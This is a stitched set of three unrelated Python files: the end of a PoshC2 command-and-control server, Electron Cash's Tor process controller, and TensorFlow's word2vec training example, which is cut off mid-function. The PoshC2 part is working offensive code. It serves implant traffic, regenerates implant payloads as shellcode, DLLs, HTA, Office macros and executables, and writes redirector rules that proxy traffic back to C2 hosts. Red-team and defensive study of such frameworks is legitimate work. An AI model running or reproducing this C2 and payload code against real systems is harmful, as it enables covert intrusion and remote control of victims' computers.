self.send_header("Content-Length", len(sharpout))
except Exception:
self.send_header("Content-Length", 0)
self.end_headers()
open("%swebserver.log" % PoshProjectDirectory, "a").write("[-] Error with SharpSocks - is SharpSocks running %s%s\r\n%s\r\n" % (SocksHost, UriPath, traceback.format_exc()))
open("%swebserver.log" % PoshProjectDirectory, "a").write("[-] SharpSocks %s\r\n" % e)
print(Colours.RED + "Error with SharpSocks or old implant connection - is SharpSocks running" + Colours.END)
print(Colours.RED + UriPath + Colours.END)
self.send_response(404)
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(bytes(HTTPResponse, "utf-8"))
else:
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(default_response())
except Exception as e:
print(Colours.RED + "Generic error in POST request!" + Colours.END)
print(Colours.RED + UriPath + Colours.END)
print(e)
traceback.print_exc()
ThreadingMixIn.daemon_threads = True
class ThreadedHTTPServer(ThreadingMixIn, HTTPServer):
"""Handle requests in a separate thread."""
def log_c2_messages():
while True:
messages = get_c2_messages()
if messages is not None:
for message in messages:
print(message)
time.sleep(2)
def main(args):
httpd = ThreadedHTTPServer((BindIP, BindPort), MyHandler)
try:
if os.name == 'nt':
os.system('cls')
else:
os.system('clear')
except Exception:
print("cls")
print(chr(27) + "[2J")
print(Colours.GREEN + logopic)
print(Colours.END + "")
if os.path.isfile(Database):
print(("Using existing project: %s" % PoshProjectDirectory) + Colours.GREEN)
database_connect()
C2 = get_c2server_all()
if ((C2[1] == PayloadCommsHost) and (C2[3] == DomainFrontHeader)):
qstart = "%squickstart.txt" % (PoshProjectDirectory)
if os.path.exists(qstart):
with open(qstart, 'r') as f:
print(f.read())
else:
print("Error: different IP so regenerating payloads")
if os.path.exists("%spayloads_old" % PoshProjectDirectory):
import shutil
shutil.rmtree("%spayloads_old" % PoshProjectDirectory)
os.rename(PayloadsDirectory, "%spayloads_old" % PoshProjectDirectory)
os.makedirs(PayloadsDirectory)
C2 = get_c2server_all()
newPayload = Payloads(C2[5], C2[2], PayloadCommsHost, DomainFrontHeader, C2[8], C2[12],
C2[13], C2[11], "", "", C2[19], C2[20], C2[21], get_newimplanturl(), PayloadsDirectory)
new_urldetails("updated_host", PayloadCommsHost, C2[3], "", "", "", "")
update_item("PayloadCommsHost", "C2Server", PayloadCommsHost)
update_item("QuickCommand", "C2Server", QuickCommand)
update_item("DomainFrontHeader", "C2Server", DomainFrontHeader)
newPayload.CreateRaw()
newPayload.CreateDlls()
newPayload.CreateShellcode()
newPayload.CreateSCT()
newPayload.CreateHTA()
newPayload.CreateCS()
newPayload.CreateMacro()
newPayload.CreateEXE()
newPayload.CreateMsbuild()
newPayload.CreatePython()
newPayload.WriteQuickstart(PoshProjectDirectory + 'quickstart.txt')
else:
print("Initializing new project folder and database" + Colours.GREEN)
print("")
directory = os.path.dirname(PoshProjectDirectory)
if not os.path.exists(PoshProjectDirectory): os.makedirs(PoshProjectDirectory)
if not os.path.exists(DownloadsDirectory): os.makedirs(DownloadsDirectory)
if not os.path.exists(ReportsDirectory): os.makedirs(ReportsDirectory)
if not os.path.exists(PayloadsDirectory): os.makedirs(PayloadsDirectory)
initializedb()
if not validate_sleep_time(DefaultSleep):
print(Colours.RED)
print("Invalid DefaultSleep in config, please specify a time such as 50s, 10m or 1h")
print(Colours.GREEN)
sys.exit(1)
setupserver(PayloadCommsHost, gen_key().decode("utf-8"), DomainFrontHeader, DefaultSleep, KillDate, HTTPResponse, PoshProjectDirectory, PayloadCommsPort, QuickCommand, DownloadURI, "", "", "", Sounds, ClockworkSMS_APIKEY, ClockworkSMS_MobileNumbers, URLS, SocksURLS, Insecure, UserAgent, Referrer, Pushover_APIToken, Pushover_APIUser, EnableNotifications)
rewriteFile = "%s/rewrite-rules.txt" % directory
print("Creating Rewrite Rules in: " + rewriteFile)
print("")
rewriteHeader = ["RewriteEngine On", "SSLProxyEngine On", "SSLProxyCheckPeerCN Off", "SSLProxyVerify none", "SSLProxyCheckPeerName off", "SSLProxyCheckPeerExpire off", "# Change IPs to point at C2 infrastructure below", "Define PoshC2 10.0.0.1", "Define SharpSocks 10.0.0.1"]
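# The header above is written verbatim to rewrite-rules.txt together with the
# generated rules from urlConfig below; the two Define lines are placeholders
# an operator edits so the Apache redirector proxies implant and SharpSocks
# traffic back to the C2 host.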
rewriteFileContents = rewriteHeader + urlConfig.fetchRewriteRules() + urlConfig.fetchSocksRewriteRules()
with open(rewriteFile, 'w') as outFile:
for line in rewriteFileContents:
outFile.write(line)
outFile.write('\n')
outFile.close()
C2 = get_c2server_all()
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12],
C2[13], C2[11], "", "", C2[19], C2[20],
C2[21], get_newimplanturl(), PayloadsDirectory)
new_urldetails("default", C2[1], C2[3], "", "", "", "")
newPayload.CreateRaw()
newPayload.CreateDlls()
newPayload.CreateShellcode()
newPayload.CreateSCT()
newPayload.CreateHTA()
newPayload.CreateCS()
newPayload.CreateMacro()
newPayload.CreateEXE()
newPayload.CreateMsbuild()
create_self_signed_cert(PoshProjectDirectory)
newPayload.CreatePython()
newPayload.WriteQuickstart(directory + '/quickstart.txt')
print("")
print("CONNECT URL: " + select_item("PayloadCommsHost", "C2Server") + get_newimplanturl() + Colours.GREEN)
print("WEBSERVER Log: %swebserver.log" % PoshProjectDirectory)
global KEY
KEY = get_baseenckey()
print("")
print(time.asctime() + " PoshC2 Server Started - %s:%s" % (BindIP, BindPort))
from datetime import date, datetime
killdate = datetime.strptime(C2[5], '%d/%m/%Y').date()
datedifference = number_of_days(date.today(), killdate)
if datedifference < 8:
print(Colours.RED + ("\nKill Date is - %s - expires in %s days" % (C2[5], datedifference)))
else:
print(Colours.GREEN + ("\nKill Date is - %s - expires in %s days" % (C2[5], datedifference)))
print(Colours.END)
protocol = urlparse(PayloadCommsHost).scheme
if protocol == 'https':
if (os.path.isfile("%sposh.crt" % PoshProjectDirectory)) and (os.path.isfile("%sposh.key" % PoshProjectDirectory)):
try:
httpd.socket = ssl.wrap_socket(httpd.socket, keyfile="%sposh.key" % PoshProjectDirectory, certfile="%sposh.crt" % PoshProjectDirectory, server_side=True, ssl_version=ssl.PROTOCOL_TLS)
except Exception:
httpd.socket = ssl.wrap_socket(httpd.socket, keyfile="%sposh.key" % PoshProjectDirectory, certfile="%sposh.crt" % PoshProjectDirectory, server_side=True, ssl_version=ssl.PROTOCOL_TLSv1)
else:
raise ValueError("Cannot find the certificate files")
c2_message_thread = threading.Thread(target=log_c2_messages, daemon=True)
c2_message_thread.start()
try:
httpd.serve_forever()
except (KeyboardInterrupt, EOFError):
httpd.server_close()
print(time.asctime() + " PoshC2 Server Stopped - %s:%s" % (BindIP, BindPort))
sys.exit(0)
if __name__ == '__main__':
args = sys.argv
main(args)
|
controller.py
|
# Electron Cash - lightweight Bitcoin client
# Copyright (C) 2019, 2020 Axel Gembe <derago@gmail.com>
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import os
import re
import subprocess
import sys
import threading
import shutil
import socket
import inspect
from enum import IntEnum, unique
from typing import Tuple, Optional
import stem.socket
import stem.process
import stem.control
import stem
from .. import util, version
from ..util import PrintError
from ..utils import Event
from ..simple_config import SimpleConfig
# Python 3.10 workaround for stem package which is using collections.Iterable (removed in 3.10)
if sys.version_info >= (3, 10):
if hasattr(stem, '__version__') and version.parse_package_version(stem.__version__)[:2] <= (1, 8):
import collections.abc
# monkey-patch collections.Iterable back since stem.control expects to see this name
stem.control.collections.Iterable = collections.abc.Iterable
_TOR_ENABLED_KEY = 'tor_enabled'
_TOR_ENABLED_DEFAULT = False
_TOR_SOCKS_PORT_KEY = 'tor_socks_port'
_TOR_SOCKS_PORT_DEFAULT = 0
def check_proxy_bypass_tor_control(*args, **kwargs) -> bool:
"""
This function returns True when called by stem.socket.ControlPort to prevent
the Tor control connection going through a proxied socket.
"""
stack = inspect.stack()
if stack and len(stack) >= 4:
# [0] is this function, [1] is the genexpr in _socksocket_filtered,
# [2] is _socksocket_filtered and [3] is the caller. In newer stem
# versions socket is not called directly but through asyncio.
for s in stack[3:7]:
caller_self = s.frame.f_locals.get('self')
if caller_self and type(caller_self) is stem.socket.ControlPort:
return True
return False
class TorController(PrintError):
@unique
class Status(IntEnum):
STOPPING = 0
STOPPED = 1
STARTED = 2
READY = 3
ERRORED = 4
@unique
class BinaryType(IntEnum):
MISSING = 0
INTEGRATED = 1
SYSTEM = 2
_config: SimpleConfig = None
_tor_process: subprocess.Popen = None
_tor_read_thread: threading.Thread = None
_tor_controller: stem.control.Controller = None
status = Status.STOPPED
status_changed = Event()
active_socks_port: int = None
active_control_port: int = None
active_port_changed = Event()
tor_binary: str
tor_binary_type: BinaryType = BinaryType.MISSING
def __init__(self, config: SimpleConfig):
if not config:
raise AssertionError('TorController: config must be set')
self._config = config
if not self.detect_tor() and self.is_enabled():
self.print_error("Tor enabled but no usable Tor binary found, disabling")
self.set_enabled(False)
socks_port = self._config.get(
_TOR_SOCKS_PORT_KEY, _TOR_SOCKS_PORT_DEFAULT)
if not socks_port or not self._check_port(int(socks_port)):
# If no valid SOCKS port is set yet, we set the default
self._config.set_key(_TOR_SOCKS_PORT_KEY, _TOR_SOCKS_PORT_DEFAULT)
def __del__(self):
self.status_changed.clear()
self.active_port_changed.clear()
# Version 0.4.5.5
# [notice] Opening Socks listener on 127.0.0.1:0
# [notice] Socks listener listening on port 36103.
# [notice] Opened Socks listener connection (ready) on 127.0.0.1:36103
# [notice] Opening Control listener on 127.0.0.1:0
# [notice] Control listener listening on port 36104.
# [notice] Opened Control listener connection (ready) on 127.0.0.1:36104
# Version 0.4.2.5
# [notice] Opening Socks listener on 127.0.0.1:0
# [notice] Socks listener listening on port 36103.
# [notice] Opened Socks listener on 127.0.0.1:36103
# [notice] Opening Control listener on 127.0.0.1:0
# [notice] Control listener listening on port 36104.
# [notice] Opened Control listener on 127.0.0.1:36104
_listener_re = re.compile(r".*\[notice\] ([^ ]*) listener listening on port ([0-9]+)\.?$")
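# Example: the line "[notice] Socks listener listening on port 36103." yields
# group(1) == "Socks" and group(2) == "36103".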
# If a log string matches any of the included regex it is ignored
_ignored_res = [
re.compile(r".*This port is not an HTTP proxy.*"), # This is caused by the network dialog TorDetector
]
def _tor_msg_handler(self, message: str):
if util.is_verbose:
if all(not regex.match(message) for regex in TorController._ignored_res):
self.print_msg(message)
# Check if this is a "Opened listener" message and extract the information
# into the active_socks_port and active_control_port variables
listener_match = TorController._listener_re.match(message)
if listener_match:
listener_type = listener_match.group(1)
listener_port = int(listener_match.group(2))
if listener_type == 'Socks':
self.active_socks_port = listener_port
elif listener_type == 'Control':
self.active_control_port = listener_port
# The control port is the last port opened, so only notify after it
self.active_port_changed(self)
def _read_tor_msg(self):
try:
while self._tor_process and not self._tor_process.poll():
line = self._tor_process.stdout.readline().decode('utf-8', 'replace').strip()
if not line:
break
self._tor_msg_handler(line)
except:
self.print_exception("Exception in Tor message reader")
_orig_subprocess_popen = subprocess.Popen
@staticmethod
def _popen_monkey_patch(*args, **kwargs):
if sys.platform in ('windows', 'win32'):
if hasattr(subprocess, 'CREATE_NO_WINDOW'):
kwargs['creationflags'] = subprocess.CREATE_NO_WINDOW
else:
kwargs['creationflags'] = 0x08000000 # CREATE_NO_WINDOW, for < Python 3.7
kwargs['start_new_session'] = True
return TorController._orig_subprocess_popen(*args, **kwargs)
@staticmethod
def _get_tor_binary() -> Tuple[Optional[str], BinaryType]:
# Try to locate a bundled tor binary
if sys.platform in ('windows', 'win32'):
res = os.path.join(os.path.dirname(
__file__), '..', '..', 'tor.exe')
else:
res = os.path.join(os.path.dirname(__file__), 'bin', 'tor')
if os.path.isfile(res):
return (res, TorController.BinaryType.INTEGRATED)
# Tor is not packaged / built, try to locate a system tor
res = shutil.which('tor')
if res and os.path.isfile(res):
return (res, TorController.BinaryType.SYSTEM)
return (None, TorController.BinaryType.MISSING)
def detect_tor(self) -> bool:
path, bintype = self._get_tor_binary()
self.tor_binary = path
self.tor_binary_type = bintype
return self.is_available()
def is_available(self) -> bool:
return self.tor_binary_type != TorController.BinaryType.MISSING
def start(self):
if self._tor_process:
# Tor is already running
return
if not self.is_enabled():
# Don't start Tor if not enabled
return
if self.tor_binary_type == TorController.BinaryType.MISSING:
self.print_error("No Tor binary found")
self.status = TorController.Status.ERRORED
self.status_changed(self)
return
# When the socks port is set to zero, we let tor choose one
socks_port = str(self.get_socks_port())
if socks_port == '0':
socks_port = 'auto'
try:
subprocess.Popen = TorController._popen_monkey_patch
self._tor_process = stem.process.launch_tor_with_config(
tor_cmd=self.tor_binary,
completion_percent=0, # We will monitor the bootstrap status
init_msg_handler=self._tor_msg_handler,
take_ownership=True,
close_output=False,
config={
'SocksPort': socks_port,
'ControlPort': 'auto',
'CookieAuthentication': '1',
'DataDirectory': os.path.join(self._config.path, 'tor'),
'Log': 'NOTICE stdout',
},
)
except:
self.print_exception("Failed to start Tor")
self._tor_process = None
self.status = TorController.Status.ERRORED
self.status_changed(self)
return
finally:
subprocess.Popen = TorController._orig_subprocess_popen
self._tor_read_thread = threading.Thread(
target=self._read_tor_msg, name="Tor message reader")
self._tor_read_thread.start()
self.status = TorController.Status.STARTED
self.status_changed(self)
try:
self._tor_controller = stem.control.Controller.from_port(
port=self.active_control_port)
self._tor_controller.authenticate()
self._tor_controller.add_event_listener(
self._handle_network_liveliness_event, stem.control.EventType.NETWORK_LIVENESS) # pylint: disable=no-member
except:
self.print_exception("Failed to connect to Tor control port")
self.stop()
return
self.print_error("started (Tor version {})".format(
self._tor_controller.get_version()))
def stop(self):
if not self._tor_process:
# Tor is not running
return
self.status = TorController.Status.STOPPING
self.status_changed(self)
self.active_socks_port = None
self.active_control_port = None
self.active_port_changed(self)
if self._tor_controller:
# tell tor to shut down
self._tor_controller.signal(stem.Signal.HALT) # pylint: disable=no-member
self._tor_controller.close()
self._tor_controller = None
if self._tor_process:
try:
try:
self._tor_process.wait(1.0)
# if the wait doesn't raise an exception, the process has terminated
except subprocess.TimeoutExpired:
# process is still running, try to terminate it
self._tor_process.terminate()
self._tor_process.wait()
except ProcessLookupError:
self.print_exception("Failed to terminate Tor process")
self._tor_process = None
if self._tor_read_thread:
self._tor_read_thread.join()
self._tor_read_thread = None
self.status = TorController.Status.STOPPED
self.status_changed(self)
self.print_error("stopped")
def _handle_network_liveliness_event(self, event: stem.response.events.NetworkLivenessEvent):
old_status = self.status
self.status = TorController.Status.READY if event.status == 'UP' else TorController.Status.STARTED
if old_status != self.status:
self.status_changed(self)
def _check_port(self, port: int) -> bool:
if not isinstance(port, int):
return False
if port is None:
return False
if port != 0: # Port 0 is automatic
if port < 1024 or port > 65535:
return False
return True
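# Examples: _check_port(0) is True (tor picks a port itself), _check_port(9050)
# is True, _check_port(80) is False (privileged), _check_port(70000) is False.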
def set_enabled(self, enabled: bool):
self._config.set_key(_TOR_ENABLED_KEY, enabled)
if enabled:
self.start()
else:
self.stop()
def is_enabled(self) -> bool:
return bool(self._config.get(_TOR_ENABLED_KEY, _TOR_ENABLED_DEFAULT))
def set_socks_port(self, port: int):
if not self._check_port(port):
raise AssertionError('TorController: invalid port')
self.stop()
self._config.set_key(_TOR_SOCKS_PORT_KEY, port)
self.start()
def get_socks_port(self) -> int:
socks_port = self._config.get(
_TOR_SOCKS_PORT_KEY, _TOR_SOCKS_PORT_DEFAULT)
if not self._check_port(int(socks_port)):
raise AssertionError('TorController: invalid port')
return int(socks_port)
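# Minimal usage sketch (not part of the original module; the callback
# registration API of utils.Event is assumed and not shown here):
#
#   config = SimpleConfig()
#   tor = TorController(config)
#   # subscribe to tor.status_changed / tor.active_port_changed via utils.Event,
#   # then read tor.active_socks_port once the Control listener is up
#   tor.set_enabled(True)    # persists the flag and launches tor
#   ...
#   tor.set_enabled(False)   # shuts the tor process down again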
|
word2vec.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Multi-threaded word2vec mini-batched skip-gram model.
Trains the model described in:
(Mikolov et al.) Efficient Estimation of Word Representations in Vector Space
ICLR 2013.
http://arxiv.org/abs/1301.3781
This model does traditional minibatching.
The key ops used are:
* placeholder for feeding in tensors for each example.
* embedding_lookup for fetching rows from the embedding matrix.
* sigmoid_cross_entropy_with_logits to calculate the loss.
* GradientDescentOptimizer for optimizing the loss.
* skipgram custom op that does input processing.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import sys
import threading
import time
from six.moves import xrange # pylint: disable=redefined-builtin
import numpy as np
import tensorflow as tf
from tensorflow.models.embedding import gen_word2vec as word2vec
flags = tf.app.flags
flags.DEFINE_string("save_path", None, "Directory to write the model and "
"training summaries.")
flags.DEFINE_string("train_data", None, "Training text file. "
"E.g., unzipped file http://mattmahoney.net/dc/text8.zip.")
flags.DEFINE_string(
"eval_data", None, "File consisting of analogies of four tokens."
"embedding 2 - embedding 1 + embedding 3 should be close "
"to embedding 4."
"E.g. https://word2vec.googlecode.com/svn/trunk/questions-words.txt.")
flags.DEFINE_integer("embedding_size", 200, "The embedding dimension size.")
flags.DEFINE_integer(
"epochs_to_train", 15,
"Number of epochs to train. Each epoch processes the training data once "
"completely.")
flags.DEFINE_float("learning_rate", 0.2, "Initial learning rate.")
flags.DEFINE_integer("num_neg_samples", 100,
"Negative samples per training example.")
flags.DEFINE_integer("batch_size", 16,
"Number of training examples processed per step "
"(size of a minibatch).")
flags.DEFINE_integer("concurrent_steps", 12,
"The number of concurrent training steps.")
flags.DEFINE_integer("window_size", 5,
"The number of words to predict to the left and right "
"of the _targets word.")
flags.DEFINE_integer("min_count", 5,
"The minimum number of word occurrences for it to be "
"included in the vocabulary.")
flags.DEFINE_float("subsample", 1e-3,
"Subsample threshold for word occurrence. Words that appear "
"with higher frequency will be randomly down-sampled. Set "
"to 0 to disable.")
flags.DEFINE_boolean(
"interactive", False,
"If true, enters an IPython interactive session to play with the trained "
"model. E.g., try model.analogy(b'france', b'paris', b'russia') and "
"model.nearby([b'proton', b'elephant', b'maxwell'])")
flags.DEFINE_integer("statistics_interval", 5,
"Print statistics every n seconds.")
flags.DEFINE_integer("summary_interval", 5,
"Save training summary to file every n seconds (rounded "
"up to statistics interval).")
flags.DEFINE_integer("checkpoint_interval", 600,
"Checkpoint the model (i.e. save the parameters) every n "
"seconds (rounded up to statistics interval).")
FLAGS = flags.FLAGS
class Options(object):
"""Options used by our word2vec model."""
def __init__(self):
# Model options.
# Embedding dimension.
self.emb_dim = FLAGS.embedding_size
# Training options.
# The training text file.
self.train_data = FLAGS.train_data
# Number of negative samples per example.
self.num_samples = FLAGS.num_neg_samples
# The initial learning rate.
self.learning_rate = FLAGS.learning_rate
# Number of epochs to train. After these many epochs, the learning
# rate decays linearly to zero and the training stops.
self.epochs_to_train = FLAGS.epochs_to_train
# Concurrent training steps.
self.concurrent_steps = FLAGS.concurrent_steps
# Number of examples for one training step.
self.batch_size = FLAGS.batch_size
# The number of words to predict to the left and right of the _targets word.
self.window_size = FLAGS.window_size
# The minimum number of word occurrences for it to be included in the
# vocabulary.
self.min_count = FLAGS.min_count
# Subsampling threshold for word occurrence.
self.subsample = FLAGS.subsample
# How often to print statistics.
self.statistics_interval = FLAGS.statistics_interval
# How often to write to the summary file (rounds up to the nearest
# statistics_interval).
self.summary_interval = FLAGS.summary_interval
# How often to write checkpoints (rounds up to the nearest statistics
# interval).
self.checkpoint_interval = FLAGS.checkpoint_interval
# Where to write out summaries.
self.save_path = FLAGS.save_path
# Eval options.
# The text file for eval.
self.eval_data = FLAGS.eval_data
class Word2Vec(object):
"""Word2Vec model (Skipgram)."""
def __init__(self, options, session):
self._options = options
self._session = session
self._word2id = {}
self._id2word = []
self.build_graph()
self.build_eval_graph()
self.save_vocab()
self._read_analogies()
def _read_analogies(self):
"""Reads through the analogy question file.
Returns:
questions: a [n, 4] numpy array containing the analogy question's
word ids.
questions_skipped: questions skipped due to unknown words.
"""
questions = []
questions_skipped = 0
with open(self._options.eval_data, "rb") as analogy_f:
for line in analogy_f:
if line.startswith(b":"): # Skip comments.
continue
words = line.strip().lower().split(b" ")
ids = [self._word2id.get(w.strip()) for w in words]
if None in ids or len(ids) != 4:
questions_skipped += 1
else:
questions.append(np.array(ids))
print("Eval analogy file: ", self._options.eval_data)
print("Questions: ", len(questions))
print("Skipped: ", questions_skipped)
self._analogy_questions = np.array(questions, dtype=np.int32)
def forward(self, examples, labels):
"""Build the graph for the forward pass."""
opts = self._options
# Declare all variables we need.
# Embedding: [vocab_size, emb_dim]
init_width = 0.5 / opts.emb_dim
emb = tf.Variable(
tf.random_uniform(
[opts.vocab_size, opts.emb_dim], -init_width, init_width),
name="emb")
self._emb = emb
# Softmax weight: [vocab_size, emb_dim]. Transposed.
sm_w_t = tf.Variable(
tf.zeros([opts.vocab_size, opts.emb_dim]),
name="sm_w_t")
# Softmax bias: [emb_dim].
sm_b = tf.Variable(tf.zeros([opts.vocab_size]), name="sm_b")
# Global step: scalar, i.e., shape [].
self.global_step = tf.Variable(0, name="global_step")
# Nodes to compute the nce loss w/ candidate sampling.
labels_matrix = tf.reshape(
tf.cast(labels,
dtype=tf.int64),
[opts.batch_size, 1])
# Negative sampling.
sampled_ids, _, _ = (tf.nn.fixed_unigram_candidate_sampler(
true_classes=labels_matrix,
num_true=1,
num_sampled=opts.num_samples,
unique=True,
range_max=opts.vocab_size,
distortion=0.75,
unigrams=opts.vocab_counts.tolist()))
# Embeddings for examples: [batch_size, emb_dim]
example_emb = tf.nn.embedding_lookup(emb, examples)
# Weights for labels: [batch_size, emb_dim]
true_w = tf.nn.embedding_lookup(sm_w_t, labels)
# Biases for labels: [batch_size, 1]
true_b = tf.nn.embedding_lookup(sm_b, labels)
# Weights for sampled ids: [num_sampled, emb_dim]
sampled_w = tf.nn.embedding_lookup(sm_w_t, sampled_ids)
# Biases for sampled ids: [num_sampled, 1]
sampled_b = tf.nn.embedding_lookup(sm_b, sampled_ids)
# True logits: [batch_size, 1]
true_logits = tf.reduce_sum(tf.mul(example_emb, true_w), 1) + true_b
# Sampled logits: [batch_size, num_sampled]
# We replicate sampled noise labels for all examples in the batch
# using the matmul.
sampled_b_vec = tf.reshape(sampled_b, [opts.num_samples])
sampled_logits = tf.matmul(example_emb,
sampled_w,
transpose_b=True) + sampled_b_vec
return true_logits, sampled_logits
def nce_loss(self, true_logits, sampled_logits):
"""Build the graph for the NCE loss."""
# cross-entropy(logits, labels)
opts = self._options
true_xent = tf.nn.sigmoid_cross_entropy_with_logits(
true_logits, tf.ones_like(true_logits))
sampled_xent = tf.nn.sigmoid_cross_entropy_with_logits(
sampled_logits, tf.zeros_like(sampled_logits))
# NCE-loss is the sum of the true and noise (sampled words)
# contributions, averaged over the batch.
nce_loss_tensor = (tf.reduce_sum(true_xent) +
tf.reduce_sum(sampled_xent)) / opts.batch_size
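# Written out, the loss above is
#   L = (1/batch_size) * sum_i [ log(1 + exp(-true_logits_i))
#                                + sum_k log(1 + exp(sampled_logits_{i,k})) ]
# i.e. binary cross-entropy with label 1 for the true (example, label) pair and
# label 0 for each negatively sampled word.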
return nce_loss_tensor
def optimize(self, loss):
"""Build the graph to optimize the loss function."""
# Optimizer nodes.
# Linear learning rate decay.
opts = self._options
words_to_train = float(opts.words_per_epoch * opts.epochs_to_train)
lr = opts.learning_rate * tf.maximum(
0.0001, 1.0 - tf.cast(self._words, tf.float32) / words_to_train)
self._lr = lr
optimizer = tf.train.GradientDescentOptimizer(lr)
train = optimizer.minimize(loss,
global_step=self.global_step,
gate_gradients=optimizer.GATE_NONE)
self._train = train
def build_eval_graph(self):
"""Build the eval graph."""
# Eval graph
# Each analogy task is to predict the 4th word (d) given three
# words: a, b, c. E.g., a=italy, b=rome, c=france, we should
# predict d=paris.
# The eval feeds three vectors of word ids for a, b, c, each of
# which is of size N, where N is the number of analogies we want to
# evaluate in one batch.
analogy_a = tf.placeholder(dtype=tf.int32) # [N]
analogy_b = tf.placeholder(dtype=tf.int32) # [N]
analogy_c = tf.placeholder(dtype=tf.int32) # [N]
# Normalized word embeddings of shape [vocab_size, emb_dim].
nemb = tf.nn.l2_normalize(self._emb, 1)
# Each row of a_emb, b_emb, c_emb is a word's embedding vector.
# They all have the shape [N, emb_dim]
a_emb = tf.gather(nemb, analogy_a) # a's embs
b_emb = tf.gather(nemb, analogy_b) # b's embs
c_emb = tf.gather(nemb, analogy_c) # c's embs
# We expect that d's embedding vectors on the unit hyper-sphere is
# near: c_emb + (b_emb - a_emb), which has the shape [N, emb_dim].
target = c_emb + (b_emb - a_emb)
# Compute cosine distance between each pair of _targets and vocab.
# dist has shape [N, vocab_size].
dist = tf.matmul(target, nemb, transpose_b=True)
# For each question (row in dist), find the top 4 words.
_, pred_idx = tf.nn.top_k(dist, 4)
# Nodes for computing neighbors for a given word according to
# their cosine distance.
nearby_word = tf.placeholder(dtype=tf.int32) # word id
nearby_emb = tf.gather(nemb, nearby_word)
nearby_dist = tf.matmul(nearby_emb, nemb, transpose_b=True)
nearby_val, nearby_idx = tf.nn.top_k(nearby_dist,
min(1000, self._options.vocab_size))
# Nodes in the construct graph which are used by training and
# evaluation to run/feed/fetch.
self._analogy_a = analogy_a
self._analogy_b = analogy_b
self._analogy_c = analogy_c
self._analogy_pred_idx = pred_idx
self._nearby_word = nearby_word
self._nearby_val = nearby_val
self._nearby_idx = nearby_idx
def build_graph(self):
"""Build the graph for the full model."""
opts = self._options
# The training data. A text file.
(words, counts, words_per_epoch, self._epoch, self._words, examples,
labels) = word2vec.skipgram(filename=opts.train_data,
batch_size=opts.batch_size,
window_size=opts.window_size,
min_count=opts.min_count,
subsample=opts.subsample)
(opts.vocab_words, opts.vocab_counts,
opts.words_per_epoch) = self._session.run([words, counts, words_per_epoch])
opts.vocab_size = len(opts.vocab_words)
print("Data file: ", opts.train_data)
print("Vocab size: ", opts.vocab_size - 1, " + UNK")
print("Words per epoch: ", opts.words_per_epoch)
self._examples = examples
self._labels = labels
self._id2word = opts.vocab_words
for i, w in enumerate(self._id2word):
self._word2id[w] = i
true_logits, sampled_logits = self.forward(examples, labels)
loss = self.nce_loss(true_logits, sampled_logits)
tf.scalar_summary("NCE loss", loss)
self._loss = loss
self.optimize(loss)
# Properly initialize all variables.
tf.initialize_all_variables().run()
self.saver = tf.train.Saver()
def save_vocab(self):
"""Save the vocabulary to a file so the model can be reloaded."""
opts = self._options
with open(os.path.join(opts.save_path, "vocab.txt"), "w") as f:
for i in xrange(opts.vocab_size):
vocab_word = tf.compat.as_text(opts.vocab_words[i]).encode("utf-8")
f.write("%s %d\n" % (vocab_word,
opts.vocab_counts[i]))
def _train_thread_body(self):
initial_epoch, = self._session.run([self._epoch])
while True:
_, epoch = self._session.run([self._train, self._epoch])
if epoch != initial_epoch:
break
def train(self):
"""Train the model."""
opts = self._options
initial_epoch, initial_words = self._session.run([self._epoch, self._words])
summary_op = tf.merge_all_summaries()
summary_writer = tf.train.SummaryWriter(opts.save_path, self._session.graph)
workers = []
for _ in xrange(opts.concurrent_steps):
t = threading.Thread(target=self._train_thread_body)
t.start()
workers.append(t)
last_words, last_time, last_summary_time = initial_words, time.time(), 0
last_checkpoint_time = 0
while True:
time.sleep(opts.statistics_interval)  # Report our progress once in a while.
(epoch, step, loss, words, lr) = self._session.run(
[self._epoch, self.global_step, self._loss, self._words, self._lr])
now = time.time()
last_words, last_time, rate = words, now, (words - last_words) / (
now - last_time)
print("Epoch %4d Step %8d: lr = %5.3f loss = %6.2f words/sec = %8.0f\r" %
(epoch, step, lr, loss, rate), end="")
sys.stdout.flush()
if now - last_summary_time > opts.summary_interval:
summary_str = self._session.run(summary_op)
summary_writer.add_summary(summary_str, step)
last_summary_time = now
if now - last_checkpoint_time > opts.checkpoint_interval:
self.saver.save(self._session,
os.path.join(opts.save_path, "model.ckpt"),
global_step=step.astype(int))
last_checkpoint_time = now
if epoch != initial_epoch:
break
for t in workers:
t.join()
return epoch
def _predict(self, analogy):
"""Predict the top 4 answers for analogy questions."""
idx, = self._session.run([self._analogy_pred_idx], {
self._analogy_a: analogy[:, 0],
self._analogy_b: analogy[:, 1],
self._analogy_c: analogy[:, 2]
})
return idx
def eval(self):
"""Evaluate analogy questions and reports accuracy."""
# How many questions we get right at precision@1.
correct = 0
total = self._analogy_questions.shape[0]
start = 0
while start < total:
limit = start + 2500
sub = self._analogy_questions[start:limit, :]
idx = self._predict(sub)
start = limit
